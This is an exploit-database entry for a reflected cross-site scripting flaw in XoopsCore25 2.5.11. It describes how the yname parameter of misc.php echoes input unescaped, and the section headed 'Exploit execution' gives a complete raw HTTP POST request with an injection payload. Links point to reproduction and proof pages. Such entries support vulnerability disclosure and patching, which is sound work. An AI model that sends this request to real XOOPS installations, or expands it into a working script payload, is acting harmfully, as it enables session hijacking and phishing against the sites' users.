Share
## https://sploitus.com/exploit?id=PACKETSTORM:177106
## Title: XoopsCore25-2.5.11-XSS-Reflected  
## Author: nu11secur1ty  
## Date: 02/12/2024  
## Vendor: https://xoops.org/  
## Software: https://github.com/XOOPS/XoopsCore25/releases/tag/v2.5.11  
## Reference: https://portswigger.net/kb/issues/00200300_cross-site-scripting-reflected  
  
## Description:  
The value of the yname request parameter is copied into the value of  
an HTML tag attribute which is encapsulated in single quotation marks.  
The payload '>333< was submitted in the yname parameter. This input  
was echoed unmodified in the application's response. The attacker can  
trick the user to visit very dangerous and malicious URL in this  
session  
  
STATUS: HIGH Vulnerability  
  
[+]Exploit execution:  
```POST  
POST /XoopsCore25-2.5.11/htdocs/misc.php HTTP/1.1  
Host: pwnedhost.com  
Accept-Encoding: gzip, deflate, br  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Accept-Language: en-US;q=0.9,en;q=0.8  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160  
Safari/537.36  
Connection: close  
Cache-Control: max-age=0  
Cookie: xoops_session_65ca21e5=1mc2a5bq1c0m2kh9j1qn5ilqmn  
Origin: https://pwnedhost.com  
Upgrade-Insecure-Requests: 1  
Referer: https://pwnedhost.com/XoopsCore25-2.5.11/htdocs/misc.php?action=showpopups&type=friend&op=sendform&t=1707748563  
Content-Type: application/x-www-form-urlencoded  
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="121", "Chromium";v="121"  
Sec-CH-UA-Platform: Windows  
Sec-CH-UA-Mobile: ?0  
Content-Length: 148  
  
yname=VHBoIy'%3e%3ccXWog%3c&ymail=VHBoIy&fname=VHBoIyxV&fmail=VHBoIy&submit=Send&XOOPS_TOKEN_REQUEST=8a6867d76a2aace97646eefb42934056&action=showpopups&type=friend  
```  
  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/xoops.org/XoopsCore25-2.5.11)  
  
## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2024/02/xoopscore25-2511-xss-reflected.html)  
  
## Time spent:  
01:17:00